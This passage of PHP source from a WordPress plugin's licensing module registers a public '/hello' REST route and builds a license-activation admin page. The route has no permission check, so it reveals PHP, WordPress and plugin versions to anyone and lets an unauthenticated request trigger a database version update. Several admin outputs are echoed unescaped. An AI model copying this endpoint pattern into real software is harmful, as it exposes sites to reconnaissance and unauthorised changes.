					register_rest_route( $licensor, '/hello(?:/(?P<check>[a-zA-Z0-9]))?', array(
						'methods'  => ['POST','GET'],
						'callback' => function($data=[]){
							$response = new AppsbdAPIResponse();
							$response->status=true;
							$datares=new stdClass();
							$isCheck=! empty( $data['check'])&& $data['check']=="d";
							$isInfo=! empty( $data['check'])&& $data['check']=="i";
							$isCheck2=! empty( $data['check'])&& $data['check']=="c";
							$datares->pversion    = APBDLicenseSettings::GetModuleInstance()->kernelObject->pluginVersion;
							$datares->response_time=gmdate("Y-m-d\TH:i:s\Z");
							
							if($isCheck2 ) {
								$datares->nlv=true;
								$datares->pversion    = APBDLicenseSettings::GetModuleInstance()->kernelObject->pluginVersion;
							}
							if($isCheck || $isInfo) {
								$datares->phpv        = PHP_VERSION;
								$datares->wpv         = get_bloginfo( 'version' );
							}
							if($isCheck){
								$datares->db_modified = true;
								APBDLicenseSettings::DoVersionUpdate($datares->pversion,$datares->pversion,true);
							}
							$response->SetResponse(true,"Ping Success",$datares);
							return $response;
						}
					));
					
                } );
				
            }
		}
	}
	
	if(!function_exists("APBLIC_AdminMenu")) {
		/**
		 * @param AppsBDKarnel s$coreObjec
		 */
		function APBLIC_AdminMenu() {
			$coreObject=APBDLic::GetInstance();
			$menu_label = $coreObject->menuTitle;
			if(!$coreObject->isModuleLoaded()) {
				add_menu_page( $coreObject->pluginName, $menu_label, 'activate_plugins', $coreObject->pluginBaseName,
					function()use($coreObject){
						?>
                        <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
                            <input type="hidden" name="action" value="<?php echo $coreObject->pluginBaseName ?>_el_activate_license"/>
                            <div class="el-license-container">
                                <h3 class="el-license-title"><i class="dashicons dashicons-elite-licensor"></i> <?php echo $coreObject->pluginName; ?></h3>
                                <hr>
								<?php
									if(!empty($coreObject->showMessage) && !empty($coreObject->licenseMessage)){
										?>
                                        <div class="notice notice-error is-dismissible">
                                            <p><?php echo $coreObject->licenseMessage; ?></p>
                                        </div>
										<?php
									}
								?>
                                <p>Enter your license key here, to activate the product, and get full feature updates and premium support.</p>
                                <div class="el-license-field">
                                    <label for="el_license_key">License code</label>
                                    <input type="text" class="regular-text code" name="_apbdlcelic" size="50" placeholder="xxxxxxxx-xxxxxxxx-xxxxxxxx-xxxxxxxx" required="required">
                                </div>
                                <div class="el-license-field">
                                    <label for="el_license_key">Email Address</label>
									<?php
										$purchaseEmail   = get_option( "apblc_el_license_email", get_bloginfo( 'admin_email' ));
									?>
                                    <input type="text" class="regular-text code" name="apblc_el_license_email" size="50" value="<?php echo $purchaseEmail; ?>" placeholder="" required="required">
                                    <div><small>We will send update news of this product by this email address, don't worry, we hate spam</small></div>
                                </div>
                                <div class="el-license-active-btn">
									<?php wp_nonce_field( 'apbd-el-license-r' ); ?>
									<?php submit_button('Activate'); ?>
                                </div>
                                <hr>
                                <div class="el-row">
                                    <div class="el-col el-xs-text-center">
										<?php echo $coreObject->pluginName; ?>,  Version : <?php echo $coreObject->pluginVersion; ?>,

                                        <a href="https://support.appsbd.com" class="el-button">Click Here</a> for support
                                    </div>
                                    <div class="el-col el-text-right">

                                        <div class="el-copy-right-text">
                                            © Copyright <a href="https://appsbd.com" class="">appsbd.com</a> <?php echo date('Y');?>
                                        </div>
                                    </div>
                                </div>

                            </div>
                        </form>
						<?php
					}, ' dashicons-elite-licensor' );
				//}
			}else {
				add_menu_page( $coreObject->pluginName, $menu_label, 'activate_plugins', $coreObject->pluginBaseName,
					[$coreObject,'OptionFormBase'], ' dashicons-elite-licensor' );
				foreach ( $coreObject->moduleList as $moduleObject ) {
					$moduleObject->AdminSubMenu();
				}
			}
			/*}else{
				add_menu_page ( $this->pluginName, $this->pluginName, 'activate_plugins',$this->pluginNameWSp ,[$this,"serverErrorFailedMsg"] , plugins_url("images/menu_icon.png",$this->pluginFile));
			}*/
		}
	}